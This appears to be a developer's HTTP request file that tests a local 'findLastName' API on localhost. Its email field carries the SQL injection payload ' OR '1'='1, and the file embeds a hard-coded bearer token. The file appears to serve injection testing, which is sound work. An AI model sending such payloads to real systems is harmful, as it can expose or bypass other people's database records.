POST http://localhost:3000/api/v1/findLastName
content-type: application/json 
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiI1ZmQ4MzFmMy05Y2NjLTQ5MmQtOGEzNi0wYjFjYzMxYzc5YTQiLCJpYXQiOjE3MjkyMDQ0NTksImV4cCI6MTcyOTIwNTA1OX0.s5oXPpJacvbWYUkcbOHD_oifsxf7IQnQOyB683LHenQ

{
    "email": "' OR '1'='1"
}